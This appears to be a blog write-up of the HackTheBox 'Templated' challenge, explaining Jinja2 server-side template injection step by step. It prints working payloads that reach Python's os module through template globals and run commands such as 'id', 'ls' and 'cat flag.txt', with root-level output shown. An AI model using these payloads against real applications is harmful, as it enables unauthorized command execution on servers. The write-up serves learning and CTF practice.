Skip to main content

Templated: HackTheBox Web challenge My Perspective

 Proudly powered by Flask/Jinja2

In Jinja2, templates can inherit from other templates using the {% extends %} tag. When a template extends another template, it inherits the context of the parent template. The self._TemplateReference__context attribute is used to store this inherited context in the child template.

<ip>:<port>/{{self._TemplateReference__context }}

The page ‘<Context {‘range’: <class ‘range’>, ‘dict’: <class ‘dict’>, ‘lipsum’: <function generate_lorem_ipsum at 0x7f5a4afcfdc0>, ‘cycler’: <class ‘jinja2.utils.Cycler’>, ‘joiner’: <class ‘jinja2.utils.Joiner’>, ‘namespace’: <class ‘jinja2.utils.Namespace’>,

→ {{self._TemplateReference__context }} this gives access to the following classes

→ jinja2.utils.Cycler , jinja2.utils.Joiner , jinja2.utils.Namespace

self._TemplateReference__context: This is a reference to the private __context attribute of the TemplateReference class. It provides access to the context dictionary for the current template.

Jinja templates can be rendered with a context, which is a Python dictionary containing variables that are accessible within the template. The self._TemplateReference__context attribute stores this dictionary for the current template.

We need to access the os module to get an RCE. Jinja2 itself does not provide direct access to the os module or allow for RCE attacks, while it is possible to use Python modules like os in Jinja2 templates to access the underlying operating system. So we first need to find the location of the os module

We can use .__init__.__globals__ to access the global variables of the file the above classes are defined

→ {{self._TemplateReference__context.cycler.__init__.__globals__}} use this to get out of the class and access the global variables of the utils.py file

Payloads:

{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘id’).read()}}
{{self._TemplateReference__context.joiner.__init__.__globals__.os.popen(‘id’).read()}}
{{self._TemplateReference__context.namespace.__init__.__globals__.os.popen(‘id’).read()}}

>>> The page ‘uid=0(root) gid=0(root) groups=0(root) ‘ could not be found

  • .os: This is the os module in Python, which provides a way to interact with the operating system.
  • .popen('id').read(): This is a method call on the os module that runs the id command in the shell and reads its output. The popen() method opens a pipe to the shell, and the read() method reads the output from that pipe.

We are already inside the template context, as we are inside the template file which is rendered by the template engine. So we can remove the “self.__TemplateReference__context ” from the payload

Final payload:

This is the payload to access the os module in a Server Side Template Injection in jinja2.

{{namespace.__init__.__globals__.os.popen(‘ls’).read()}}

{{namespace.__init__.__globals__.os.popen(‘cat flag.txt’).read()}}

We can also use any other class mentioned above.


Labels

Labels:

Comments

Post a Comment

Popular posts from this blog

Bug Boundy Methodology, Tools & Resources

Start by defining a clear objective, such as exploiting a remote code execution (RCE) vulnerability or bypassing authentication on your target. Then, consider how you can achieve this goal using various attack vectors like XSS, SSRF, or others - these are simply tools to help you reach your objective. Use the target as how a normal user would, while browsing keep these questions in mind: 1)How does the app pass data? 2)How/where does the app talk about users? 3)Does the app have multi-tenancy or user levels? 4)Does the app have a unique threat model? 5)Has there been past security research & vulnerabilities? 6)How does the app handle XSS, CSRF, and code injection?
Post a Comment
Read more

Install & set up mitmweb or mitmproxy in Linux

Step 1: Go to the mitmproxy page and download the binaries. Step 2: Install the downloaded tar file with the command " tar -xzf <filename>.tar.gz " Step 3: In the FoxyProxy add the proxy 127.0.0.1:8080  and turn it on. Step 4 : In the terminal run command " ./mitmweb " Step 5: Go to the page  http://mitm.it/   and download the mitmproxy's Certificate. Step 6: If you downloaded the certificate for Firefox, then go to " settings -> Privacy & Security -> Click View Certificates -> Click  Import ", then import the certificate.  Step 7: Now you are ready to capture the web traffic. Step 8 : In terminal run " ./mitmweb"
Post a Comment
Read more

Making CHIP-8 emulator in C

  Chip8 doc link | Components | Opcode Table GitHub - AdithyakrishnaV/Chip8_Emulator--Interpreter Contribute to AdithyakrishnaV/Chip8_Emulator--Interpreter development by creating an account on GitHub. github.com CHIP-8 programs are binary files, and your emulator must read them and operate on the bytes. You will also need a way to draw graphics to the screen and read keypresses. Many graphical libraries can do this for you or use something like SDL directly. CHIP-8 components Display 64 pixels wide and 32 pixels tall. Each pixel is a boolean value, or a bit; can be on or off (“off” pixel was just black, and “on” was white). We’ll use SDL for rendering: SDL initialization Not initialize:- returns -1  Error message is stored in SDL_GetError Initializing SDL if (SDL_Init(SDL_INIT_VIDEO)!= 0 ){ printf ( "SDL not initialized,%s\n" , SDL_GetError); exit (- 1 ); } Initialize display SDL_Window * window = SDL_CreateWindow ( "chip8" , SDL_WINDOWPOS_CENTERED , SDL_...
Post a Comment
Read more